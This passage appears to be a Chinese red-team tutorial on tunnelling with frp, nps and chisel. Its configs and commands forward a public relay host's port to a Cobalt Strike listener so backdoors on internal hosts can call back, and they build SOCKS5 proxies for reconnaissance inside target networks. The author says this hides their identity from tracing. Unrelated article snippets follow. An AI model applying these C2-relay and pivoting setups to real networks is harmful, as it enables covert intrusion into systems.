隧道技術篇2frp代理nps代理shisel代理

FRP代理

1.實現湖北內網控制北京的內網C2上線 2.實現湖北內網探針北京內網 信息收集 (socks建立和端口映射)

1.連接47.98.210.85 7000端口服務端 2.嘗試將服務端的6666轉到127.0.0.1 5555采用tcp協議,備注名proxies

serverAddr="47.98.210.85"
serverPort=7000[[proxies]]
name="test-tcp"
type="tcp"
localIP="127.0.0.1"
localPort=5555
remotePort=6666

如何利用這種情況實現c2上線 監聽器1:47.98.210.85 6666端口 監聽器2:192.168.139.141 5555端口 生成后門用監聽器1 原理就是把內網中的192.168.139.141端口流量轉發到47.98.210.85的6666端口上,我們就可以通過47.98.210.85的6666上線了

后門->47.98.210.85:6666->frp 192.168.139.141 5555->監聽器2->正常上線

如下示例 下圖中的47.98.210.85是公網服務器ip地址

如下的192.168.139.141是c2的ip地址

我們生成后門要使用公網ip的后門來生成,因為目標主機是內網,只可以訪問到公網的ip地址47.98.210.85的6666

當我們的后門攻擊內網機器,然后內網機器回去連接公網服務器,然后公網服務器存在ftps服務,kali客戶端連接的時候會吧公網服務器的6666轉換為本地的5555,然后cs監聽本地的5555,所以就可以上線了

我們來通過實驗說明一下 1.在本地kali上開啟cs服務,然后客戶端連接

2.在kali上運行frpc來配置如上,把遠程服務端的6666端口轉換為本地的5555端口

serverAddr="47.98.210.85"
serverPort=7000[[proxies]]
name="test-tcp"
type="tcp"
localIP="127.0.0.1"
localPort=5555
remotePort=6666

本地kali配置

公網服務器配置

這里我本地一直配置不成功,最后我改了一下服務端的7000端口為7001,可能是端口沖突了

3.使用cs建立監聽器 先建立一個反向鏈接公網服務器6666端口的監聽器,讓客戶端連接公網服務器

然后建立一個監聽器來監聽本地的5555端口,因為frp把公網的6666代理到了本地的5555端口

然后創建一個后門,后門是使用第一個監聽器,通過內網主機去連接公網服務器,然后公網服務器通過frp轉發到本地

然后通過在目標內網執行后門,成功上線到了c2服務器

這個好處就是紅隊在朔源的時候,他找不到我,可以隱藏我自己的身份 通過frp來端口轉發流量

內網穿透來訪問內網 1.在目標內網的windows建立frp的客戶端,然后frps建立在公網服務器中

frps配置如下

frpc配置如下

然后在本地配置proxychain代理去訪問內網服務器

就是下圖中的賬號密碼

最終我可以去訪問和192.168.198.130,因為應該和這個192.168.198.130通往段的ip地址也可以訪問,因為192.168.198.130這個ip可以上網,和47.105.65.102互通,其他的主機192.168.52.0/24這個網段訪問不通,因為是用紅日靶場做的實驗,紅日中器它機器和的網卡用的是僅主機模式沒有網關,也就是沒有路由,所以不通

端口映射和socks5代理方向不同,socks5是外部流量進入,而端口映射是本地流量映射出去,是我發送出去

NPS代理

nps是一款輕量級,高性能,功能強大的內網穿透代理服務器,目前支持udp,tcp流量轉發,可支持任何tcp,udp上層協議訪問內網網站本地支付接口,ssh訪問,遠程桌面,dns解析等,此外還支持內網http代理,外網socks5代理,p2p等,并帶有功能強大的web管理端

1.下載nps,然后上傳到服務端口,直接運行,然后訪問服務端的ip地址加端口8080

通過默認賬號admin和默認密碼123登錄

客戶端連接之后,點擊隧道

然后新增

填寫如下,將服務器的6666轉發到內網的5555端口,就是轉發到執行剛才客戶端命令的5555端口

然后和之前一樣使用兩個監聽器,一個監聽器是6666的公網服務器端口,一個是本地的5555端口,kali機做攻擊機的的話就可以通過隧道建立連接了

socks代理 1.在nps中建立socks代理,如下配置

2.新增,然后選擇socks代理

3.然后配置客戶端,客戶端在目標主機上面建立,也就是被攻擊的內網主機 4.在kali機器上使用代理,然后訪問內網,繼續內網滲透

shisel代理

內網穿透c2上線

建立服務器監聽1234
./chisel?server?-p?1234?--reverse
建立客戶端連接服務端后將141主機的5555給到服務端6666上
./shisel?client?-v?47.98.210.85:1234?R:0.0.0.0:6666:192.168.139.141:5555
后門請求6666,然后kali運行./shisel?client?-v?47.98.210.85:1234?R:0.0.0.0:6666:192.168.139.141:5555去6666轉發給自己的5555,然后自己通過5555進行cs上線

內網穿透信息收集

1.建立socks節點
建立服務器監聽1090
chisel?server?-p?1090?--socks5
2.建立客戶端連接服務端將使用socks服務
chisel?client?47.98.210.85:1090?socks?&
3.使用kali通過服務器ip地址和1090端口進行代理,信息收集

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/diannao/89188.shtml
繁體地址,請注明出處:http://hk.pswp.cn/diannao/89188.shtml
英文地址,請注明出處:http://en.pswp.cn/diannao/89188.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

[Python 基礎課程]PyCharm 的安裝

Python 的編輯器目前主流的有 PyCharm 和 Vscode。 PyCharm 是 Python 目前最主流、最常用、最推薦的 Python 編輯器。 https://www.jetbrains.com/pycharm/ PyCharm 有社區版和專業版,可以根據自己的需要下載對應的版本。社區版是收費的,對于初學者或…

Spread Ribbon 工具欄控件:在WinForms中高效編輯Spread工作簿

引言 在數據密集型應用中,電子表格功能是提升用戶體驗的關鍵要素。GrapeCity Spread.NET V17 推出的獨立 Ribbon工具欄控件,為WinForms開發者提供了與Excel高度一致的UI交互體驗。通過集成此控件,用戶可直觀地進行數據編輯、格式調整等操作&…

leedcode:找到字符串中所有字母異位詞

問題:給定兩個字符串 s 和 p,找到 s 中所有 p 的 異位詞 的子串,返回這些子串的起始索引。不考慮答案輸出的順序。 package com.text;import java.util.ArrayList; import java.util.HashMap; import java.util.List; import java.util.Map;…

華為云Flexus+DeepSeek征文|基于華為云 Flexus Dify平臺開發AI Agent的詳細流程

目錄 一、Dify 應用開發平臺 1.1 什么是 Dify? 1.2 Dify 平臺優勢 二、構建 AI Agent 2.1 創建智能客服助手 2.2 配置 LLM組件 三、訪問智能應用 3.1 應用發布 3.2 智能對話 四、API 調用智能客服助手 4.1 配置 API 訪問接口 4.2 調用智能客服助手API …

【知識圖譜構建系列7】:結果評價(1)

文章目錄 前言前情提要三元組提取結果評價腳本代碼分析幾分鐘后前言 翻了一下記錄,發現咱的知識圖譜構建已經接近10天沒有搞了。時間也是過得真快啊。但這畢竟是咱未來產生論文的主要陣地,所以得趕緊把節奏給拾起來哈~ 前情提要 我們已經可以在mistral模型的基礎上,跑通提…

BT下載工具 qBittorrent v5.1.1.10,便攜無廣告,BT下載速度翻倍

[軟件名稱]: BT下載工具 qBittorrent v5.1.1.10 [軟件大小]: 15.9 MB [下載通道]: 夸克盤 | 迅雷盤 軟件介紹 🔥《qBittorrent增強版》v5.1.1.10便攜版|BT下載神器,速度與隱私兼得🌐 ? 核心優勢: ? 無視版權限制…

裂變與重構:2025年大模型生態全景透視及未來趨勢研判

1. 2025上半年:大模型生態的裂變時刻 1.1 技術范式革命:從生成到推理的跨越 2025年1月DeepSeek的橫空出世,標志著大模型正式進入"推理時代"。這款國產模型在發布首周即突破1億用戶量級,其核心突破在于將傳統生成能力升…

【docker】如何正確拉取langgraph-api

加這些配置都沒用 # 設置代理環境變量 export HTTP_PROXY=http://127.0.0.1:7890 export HTTPS_PROXY=http://127.0.0.1:7890 # 設置更長的超時時間 export DOCKER_CLIENT_TIMEOUT=

PIXHAWK(ardupilot4.52)上傳航點的bug

起因是查看飛控日志時發現地面站上傳的平行航線,在日志看到航線卻并不是平行的。 然后對比了一下地面站上傳的航點信息跟飛控讀取到的航點信息 發現經緯度只有前幾位能夠對應上,后幾位都對應不上,兩個點之間相差了50公分。地面站工程師認為地…

車載ECU刷寫文件格式匯總詳解

我是穿拖鞋的漢子,魔都中堅持長期主義的汽車電子工程師。 老規矩,分享一段喜歡的文字,避免自己成為高知識低文化的工程師: 做到欲望極簡,了解自己的真實欲望,不受外在潮流的影響,不盲從&#x…

Redis核心知識詳解:從全局命令到高級數據結構

一、Redis全局命令詳解 1.1 鍵查看與管理 dbsize:高效獲取鍵總數(O(1)操作) 127.0.0.1:6379> dbsize (integer) 8 keys:生產環境避免使用(O(n)操作) # 查找user開頭的鍵(不推薦生產使用…

【網絡】Linux 內核優化實戰 - net.ipv4.tcp_mem

目錄 參數結構與含義與緩沖區大小參數的區別內存管理機制詳解1. 內存使用狀態與觸發邏輯2. 與其他參數的協同關系 典型調整場景與配置示例場景 1:高并發低帶寬服務(如 API 網關,數萬連接但單連接流量小)場景 2:高帶寬低…

插入排序的簡單介紹

今天給大家簡單介紹一下插入排序。 插入排序,其基本思想是將未排序的數據逐步插入到已排序序列中的合適位置,從而使整個序列逐漸有序。 下面我們看一個排序的過程(升序),給定一個int類型的數組,利用插入排…

docker搭建minio和python使用minio

1 準備工作 1.創建目錄 [rootk8s-storage tmp]# mkdir -pv minio/{data,conf} mkdir: created directory ‘minio’ mkdir: created directory ‘minio/data’ mkdir: created directory ‘minio/conf’[rootk8s-storage minio]# chmod 777 -R *2.生成https證書 openssl req…

開源代碼修復新標桿——月之暗面最新開源編程模型Kimi-Dev-72B本地部署教程,自博弈修復 Bug

一、介紹 Kimi-Dev-72B是由月之暗面(Moonshot AI)最新開源的AI編程模型,專為軟件工程任務設計,并登頂 SWE-bench Verified 基準測試榜首,超越 DeepSeek-R1 等模型,成為當前開源代碼模型的 SOTA&#xff1a…

微服務架構之基本設計原則

作為系統架構師,在進行架構設計時需要遵循一系列經過實踐驗證的核心原則,這些原則貫穿于需求分析、模塊劃分、技術選型和系統演進的全流程。以下從核心設計原則、架構特性原則、工程實踐原則三個維度,結合具體案例展開說明: 一、…

Wpf布局之WrapPanel面板!

文章目錄 前言一、引言二、使用步驟 前言 Wpf布局之WrapPanel面板! 一、引言 WrapPanel面板以一次一行或一列的方式布置控件! 二、使用步驟 WrapPanel面板Orientation屬性默認是"Horizontal",將控件從左向右進行排列&#xff…

QEMU運行RISCV版Ubuntu

宿主機為ubuntu20.04,推薦ubuntu 20.04 risc-v版, 宿主機為ubuntu24.04,推薦ubuntu 24.04 risc-v版, 安裝ubuntu 24.04 risc-v基本步驟: 1, sudo apt update sudo apt install opensbi qemu-system-misc…

【LeetCode 熱題 100】239. 滑動窗口最大值——(解法一)滑動窗口+暴力解

Problem: 239. 滑動窗口最大值 題目:給你一個整數數組 nums,有一個大小為 k 的滑動窗口從數組的最左側移動到數組的最右側。你只可以看到在滑動窗口內的 k 個數字。滑動窗口每次只向右移動一位。返回滑動窗口中的最大值 。 文章目錄 整體思路完整代碼時空…

攻防世界-MISC-red_green

知識點 1.pngLSB隱寫 步驟 方法一:zsteg 打開附件,是一張圖片,打開看不懂(其實由兩種顏色構成,0和1),用zsteg查看,發現隱寫了一張jpg圖片,使用zsteg提取。打開jpg圖片…